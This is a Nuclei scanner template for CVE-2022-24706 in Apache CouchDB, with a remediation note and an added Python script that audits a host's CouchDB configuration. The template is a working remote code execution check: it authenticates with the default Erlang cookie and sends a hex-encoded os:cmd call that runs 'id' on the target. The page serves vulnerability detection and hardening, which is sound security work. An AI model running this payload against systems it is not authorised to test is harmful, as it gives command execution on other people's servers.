CouchDB Erlang Distribution - Remote Command Execution

ID: CVE-2022-24706

Severity: critical

Author: Mzack9999,pussycat0x

Tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp

In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.

id: CVE-2022-24706
info:
  name: CouchDB Erlang Distribution - Remote Command Execution
  author: Mzack9999,pussycat0x
  severity: critical
  description: |
    In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected system.
  remediation: |
    Upgrade to versions 3.2.2 or newer. Starting from CouchDB 3.2.2, the previous default Erlang cookie value "monster" will be rejected upon startup. Upgraded installations will be required to select an alternative value.
  reference:
    - https://www.exploit-db.com/exploits/50914
    - https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit/blob/main/CVE-2022-24706-Exploit.py
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24706
    - http://www.openwall.com/lists/oss-security/2022/04/26/1
    - http://www.openwall.com/lists/oss-security/2022/05/09/1
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24706
    cwe-id: CWE-1188
    epss-score: 0.9748
    epss-percentile: 0.99964
    cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: apache
    product: couchdb
    shodan-query:
      - product:"CouchDB"
      - product:"couchdb"
      - cpe:"cpe:2.3:a:apache:couchdb"
  tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp
variables:
  name_msg: "00156e00050007499c4141414141414041414141414141"
  challenge_reply: "00157201020304"
  cookie: "monster"
  cmd: "0000006670836804610667770e41414141414140414141414141410000000300000000007700770372657883680267770e41414141414140414141414141410000000300000000006805770463616c6c77026f737703636d646c000000016b000269646a770475736572"
tcp:
  - host:
      - "{{Hostname}}"
      - "{{Host}}:9100"
    inputs:
      # auth
      - data: "{{name_msg}}"
        type: hex
        read: 1024
      - read: 1024
        name: challenge
      - data: "{{challenge_reply+md5(cookie + to_string(unpack('>I',substr(challenge, 9, 13))))}}"
        type: hex
      # rce
      - data: "{{cmd}}"
        type: hex
        read: 1024
    matchers:
      - type: word
        part: raw
        words:
          - "uid"
          - "gid"
          - "groups"
        condition: and
# digest: 4b0a00483046022100c03841951808011c271a4014edfbd3e1eb311d55d61fdfc84f1e40f6211264ec022100acae6457d844905c59b507c345f13e672e1a493a685180424fb0dfcf27514e60:922c64590222798bb761d5b6d8e72950

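This is a Nuclei network template. It connects over TCP to the target host (including port 9100), completes the Erlang distribution authentication using the default cookie "monster", and reports a match when the response contains "uid", "gid" and "groups". Run it with the Nuclei tool: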

$ nuclei -u "URL" -t "network/cves/2022/CVE-2022-24706.yaml"
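A host-side complement to the network check, as an added example that is not part of the template or of CouchDB: it audits a node's version string and the text of its `vm.args` for the default cookie named in the remediation above. Assumptions: the function names and the sample file content are constructed here, and the loopback-binding check via the Erlang kernel parameter `inet_dist_use_interface` is an extra hardening check that the page does not mention.

```python
import re

DEFAULT_COOKIE = "monster"   # default value named in the template's remediation text
FIXED_VERSION = (3, 2, 2)    # first release that rejects the default cookie

# Constructed sample vm.args content, not taken from a real host.
SAMPLE_VM_ARGS = """\
-name couchdb@127.0.0.1
# cookie below was never changed after installation
-setcookie monster
-kernel inet_dist_listen_min 9100
-kernel inet_dist_listen_max 9100
"""

def parse_vm_args(text):
    """Return (cookies, dist_interface) from vm.args text, skipping # comments."""
    cookies, iface = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = re.match(r"-setcookie\s+(\S+)", line)
        if m:
            cookies.append(m.group(1).strip("'\""))
        m = re.match(r"-kernel\s+inet_dist_use_interface\s+(\{[^}]*\})", line)
        if m:
            iface = m.group(1).replace(" ", "")
    return cookies, iface

def audit(version, vm_args_text):
    """Return a list of finding labels; an empty list means nothing was flagged."""
    findings = []
    cookies, iface = parse_vm_args(vm_args_text)
    ver = tuple(int(p) for p in re.findall(r"\d+", version)[:3])
    if ver < FIXED_VERSION:
        findings.append("version-below-3.2.2")
    if not cookies:
        # Cookie is set elsewhere (e.g. a cookie file); needs a manual check.
        findings.append("no-setcookie-in-vm.args")
    elif DEFAULT_COOKIE in cookies:
        findings.append("default-cookie")
    if iface != "{127,0,0,1}":
        # Unset or non-loopback: the distribution port is reachable off-host.
        findings.append("distribution-not-loopback-only")
    return findings

if __name__ == "__main__":
    print(audit("3.2.1", SAMPLE_VM_ARGS))
```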